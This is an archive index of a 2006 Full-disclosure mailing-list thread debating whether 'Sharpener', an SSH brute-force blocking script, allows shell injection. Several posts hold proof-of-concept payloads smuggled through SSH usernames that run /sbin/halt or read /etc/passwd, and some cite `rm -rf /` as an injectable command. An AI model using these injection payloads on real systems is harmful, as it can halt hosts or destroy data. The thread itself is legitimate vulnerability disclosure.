Re: [Full-disclosure] SSH brute force blocking tool

2006-12-05 Thread Simon Smith
You have experience in disarming land mines with a hammer while you are stark naked? Now that's a real man's job! On 11/27/06 4:20 PM, Brian Eaton [EMAIL PROTECTED] wrote: On 11/27/06, J. Oquendo [EMAIL PROTECTED] wrote: There is no hocus pocus here. Look at /var/log/secure and find the

Re: [Full-disclosure] SSH brute force blocking tool

2006-12-01 Thread Tonnerre Lombard
Salut, On Fri, 2006-12-01 at 06:59 -0500, J. Oquendo wrote: Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 awk '($5==Illegal||$6==Illegal)$9==from{print $10}' What if I set my user name to bikermice from mars? Are you going to blacklist mars then? Apparently

Re: [Full-disclosure] SSH brute force blocking tool

2006-12-01 Thread Tonnerre Lombard
Salut, On Fri, 2006-12-01 at 07:26 -0500, J. Oquendo wrote: So again... Some of you guys need to go back and read before you post In this case, the NF wasn't in your original posting, so I could hardly have seen it. Still, there are problems with it, but not security wise... awk

Re: [Full-disclosure] SSH brute force blocking tool

2006-12-01 Thread Raphael Marichez
On Fri, 01 Dec 2006, J. Oquendo wrote: Tonnerre Lombard wrote: In this case, your awk statement checks that argument $6 is Illegal (which it is) and argument $9 is from (which it is). So it takes $10 and prints it (in this case, mars.) If you check $10 to look like an IP address, I set

Re: [Full-disclosure] SSH brute force blocking tool

2006-12-01 Thread Raphael Marichez
On Fri, 01 Dec 2006, Raphael Marichez wrote: You mention (from the attached mail, you've written): sorry, here's your email -- Raphaël Marichez aka Falco ---BeginMessage--- Tavis Ormandy wrote: On Tue, Nov 28, 2006 at 04:02:36PM +, Tavis Ormandy wrote: I notice you also haven't solved

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread Tonnerre Lombard
Salut, On Mon, 2006-11-27 at 16:21 -0500, gabriel rosenkoetter wrote: Nope, I'm wrong, just the literal string `/sbin/halt`, which you never exec. Well, he does in the iptables command Mea culpa. Tavis's exploit doesn't do scary things, although he's right you should really be doing a bit

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo
Thierry Zoller wrote: Dear All, You are arguing over hypotheses where facts could rule. PLEASE someone just setup the script on a test environment and present us your results. Heck, it's not that we are discussing Metaproblems here, these are computers. Just install and make a PoC and

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread Tavis Ormandy
On Tue, Nov 28, 2006 at 09:33:03AM -0500, J. Oquendo wrote: Thierry Zoller wrote: Dear All, You are arguing over hypotheses where facts could rule. PLEASE someone just setup the script on a test environment and present us your results. Heck, it's not that we are discussing Metaproblems

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo
Tavis Ormandy wrote: However, it is certainly possible. Here is an example. #!/bin/sh command='$(x=$(pwd|head${IFS}-c1);$(cat[EMAIL PROTECTED])${x}etc${x}passwd)' ssh -o BatchMode yes a a $command@$1 Which produces log entries like this: Nov 28 15:14:15 insomniac sshd[5897]:

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread Tavis Ormandy
On Tue, Nov 28, 2006 at 10:56:33AM -0500, J. Oquendo wrote: Incorrect, did you look at the fix? It isn't unsanitized as you state: J, you have made an attempt to fix it, but it is not sufficient. An attacker can still add arbitrary hosts to the deny list. Thanks, Tavis. --

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo
Tavis Ormandy wrote: On Tue, Nov 28, 2006 at 10:56:33AM -0500, J. Oquendo wrote: Incorrect, did you look at the fix? It isn't unsanitized as you state: J, you have made an attempt to fix it, but it is not sufficient. An attacker can still add arbitrary hosts to the deny list. Thanks,

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread Thierry Zoller
Dear Tavis, TO J, you have made an attempt to fix it, but it is not sufficient. TO An attacker can still add arbitrary hosts to the deny list. Can you propose a fix? Apart from the aggressiveness of this thread I find it interesting to read (from a tech standpoint). --

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread Tavis Ormandy
On Tue, Nov 28, 2006 at 04:02:36PM +, Tavis Ormandy wrote: On Tue, Nov 28, 2006 at 10:56:33AM -0500, J. Oquendo wrote: Incorrect, did you look at the fix? It isn't unsanitized as you state: J, you have made an attempt to fix it, but it is not sufficient. An attacker can still add

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread Tavis Ormandy
On Tue, Nov 28, 2006 at 05:14:28PM +0100, Thierry Zoller wrote: Dear Tavis, TO J, you have made an attempt to fix it, but it is not sufficient. TO An attacker can still add arbitrary hosts to the deny list. Can you propose a fix? Apart from the aggressiveness of this thread I find it

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo
Tavis Ormandy wrote: On Tue, Nov 28, 2006 at 04:02:36PM +, Tavis Ormandy wrote: I notice you also haven't solved the local privilege escalation, this can be abused by local users to gain root by attempting to login with the username set to a valid passwd entry and then winning the race

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread Tavis Ormandy
On Tue, Nov 28, 2006 at 11:59:43AM -0500, J. Oquendo wrote: Tavis Ormandy wrote: On Tue, Nov 28, 2006 at 04:02:36PM +, Tavis Ormandy wrote: I notice you also haven't solved the local privilege escalation, this can be abused by local users to gain root by attempting to login with the

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread Anders B Jansson
Just one possibly silly question. Why are you working so hard to do this with complex scripts and stuff? I just wrote a little C snippet that runs on the firewall. All servers allowing external ssh send a copy of ssh auth to a port on the firewall. If it detects a brute force it adds the host

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread Brian Eaton
(Resending since this somehow didn't make it to the list the first time. Apologies if you receive two copies.) On 11/28/06, Thierry Zoller [EMAIL PROTECTED] wrote: Dear Tavis, TO J, you have made an attempt to fix it, but it is not sufficient. TO An attacker can still add arbitrary hosts to

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread J. Oquendo
Anders B Jansson wrote: Just one possibly silly question. Why are you working so hard to do this with complex scripts and stuff? I just wrote a little C snippet that runs on the firewall. All servers allowing external ssh send a copy of ssh auth to a port on the firewall. If it detects a

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread daylasoul
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Tue, 28 Nov 2006 10:59:43 -0600 J. Oquendo [EMAIL PROTECTED] wrote: Tavis Ormandy wrote: On Tue, Nov 28, 2006 at 04:02:36PM +, Tavis Ormandy wrote: I notice you also haven't solved the local privilege escalation, this can be abused by local

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-28 Thread Brian Eaton
On 11/28/06, Thierry Zoller [EMAIL PROTECTED] wrote: TO J, you have made an attempt to fix it, but it is not sufficient. TO An attacker can still add arbitrary hosts to the deny list. Can you propose a fix? Apart from the aggressiveness of this thread I find it interesting to read (from a tech

[Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo
For those interested, I wrote a program called Sharpener which is an SSH brute force blocking tool that also reports back the offenders' addresses. I have begun posting the information on the attackers as well as sending out messages (whenever possible) to the admins of these domains. Think of

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Tavis Ormandy
On Mon, Nov 27, 2006 at 02:22:10PM -0500, J. Oquendo wrote: For those interested, I wrote a program called Sharpener which is an SSH brute force blocking tool that also reports back the offenders' addresses. I have begun posting the information on the attackers as well as sending out

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo
Tavis Ormandy wrote: Nice work, really subtle rootkit. I like the email phone-home. Here's an exploit. #!/bin/sh ssh 'foo bar `/sbin/halt`'@victim Since you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Tavis Ormandy
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote: Tavis Ormandy wrote: Nice work, really subtle rootkit. I like the email phone-home. Here's an exploit. #!/bin/sh ssh 'foo bar `/sbin/halt`'@victim Since you seem to be clueless I'll answer step by step. Here goes

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread gabriel rosenkoetter
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote: Since you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory) Uh... actually, no. The provided exploit Will

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo
Tavis Ormandy wrote: On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote: Tavis Ormandy wrote: Nice work, really subtle rootkit. I like the email phone-home. Here's an exploit. #!/bin/sh ssh 'foo bar `/sbin/halt`'@victim Since you seem to be clueless I'll answer step

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo
gabriel rosenkoetter wrote: On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote: Since you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory) Uh...

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo
gabriel rosenkoetter wrote: On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote: Since you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory) Uh...

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Brian Eaton
On 11/27/06, J. Oquendo [EMAIL PROTECTED] wrote: There is no hocus pocus here. Look at /var/log/secure and find the term error retrieving and print the next line, 13th column. Then sort it and print the unique entries into /tmp/hosts.deny. After you do this, compare /tmp/hosts.deny with

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread gabriel rosenkoetter
On Mon, Nov 27, 2006 at 03:59:37PM -0500, gabriel rosenkoetter wrote: Uh... actually, no. The provided exploit Will work, and you're the idiot. Begging your pardon, you are saved by single-quoting your awk(1) statement: awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Tavis Ormandy
On Mon, Nov 27, 2006 at 04:12:11PM -0500, J. Oquendo wrote: So again dumbass... Look at the script. Although YOU'RE opening /var/log/authlog what is the script opening. I'm opening authlog as I don't use secure, the same thing applies. Please tell me you're really not that stupid. And if

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo
Tavis Ormandy wrote: I'm not sure what you mean by modification, I simply substituted the name for the logfile I use. Thanks, Tavis. So for the third time now. Explain to me how I am backdooring someone's system. [EMAIL PROTECTED] include]# uname -a Linux int-mrkt 2.6.18-1.2200.fc5 #1

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Tavis Ormandy
On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote: Mea culpa. Tavis's exploit doesn't do scary things, although he's right you should really be doing a bit more sanitization of (evil) user-supplied input, given that you're (insisting that you) run as root. Gabriel, I was

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread gabriel rosenkoetter
On Mon, Nov 27, 2006 at 09:29:33PM +, Tavis Ormandy wrote: Gabriel, I was referring to this line: awk '!/#/ /\./ !a[$0]++ {print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT}' /etc/hosts.deny |\ awk '/iptables/ !/#/ !/-s -i/'|sh (note the |sh), $1 can

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Michael Holstein
why not save all that trouble and just use the --limit directive in iptables? (examples on the netfilter mailing-list). ~Mike.

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Tavis Ormandy
On Mon, Nov 27, 2006 at 04:27:24PM -0500, J. Oquendo wrote: Tavis Ormandy wrote: I'm not sure what you mean by modification, I simply substituted the name for the logfile I use. Thanks, Tavis. So for the third time now. Explain to me how I am backdooring someone's system. J,

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread gabriel rosenkoetter
On Mon, Nov 27, 2006 at 04:27:24PM -0500, J. Oquendo wrote: So for the third time now. Explain to me how I am backdooring someone's system. [EMAIL PROTECTED] include]# uname -a Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686 i686 i386 GNU/Linux [EMAIL PROTECTED]

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo
Tavis Ormandy wrote: On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote: Mea culpa. Tavis's exploit doesn't do scary things, although he's right you should really be doing a bit more sanitization of (evil) user-supplied input, given that you're (insisting that you) run as

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Michael Holstein
That specially crafted attempt would be a HUGE raping of TCP/IP. How do you suppose it would be possible for someone to insert 0wn3ed or any other variable outside of an IP address? Remember the (in)famous quote ...that vulnerability is purely theoretical...? I think the point is you

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo
gabriel rosenkoetter wrote: You are dealing with output you can't trust there. $13 could be anything, including \n`rm -rf /`. Later on, you pass $13, unstripped of newlines, backticks, or any number of other special character to a shell running as uid 0. That shell will proceed to execute

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo
gabriel rosenkoetter wrote: On Mon, Nov 27, 2006 at 04:41:43PM -0500, J. Oquendo wrote: That specially crafted attempt would be a HUGE raping of TCP/IP. How do you suppose it would be possible for someone to insert 0wn3ed or any other variable outside of an IP address? That's

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo
Michael Holstein wrote: That specially crafted attempt would be a HUGE raping of TCP/IP. How do you suppose it would be possible for someone to insert 0wn3ed or any other variable outside of an IP address? Remember the (in)famous quote ...that vulnerability is purely theoretical...?

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Joshua D. Abraham
On 27.Nov.2006 04:39PM -0500, Michael Holstein wrote: why not save all that trouble and just use the --limit directive in iptables? (examples on the netfilter mailing-list). or use denyhosts (denyhosts.sf.net) --josh Joshua D. Abraham Northeastern University College of Computer and

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Tavis Ormandy
On Mon, Nov 27, 2006 at 04:55:46PM -0500, J. Oquendo wrote: No it can't. Even if it was rm -rf someone placed in, did you not notice my grep statement? Only print items with a decimal. At no given point anywhere on the 13th column whether it's Solaris, NetBSD, FreeBSD, would there be an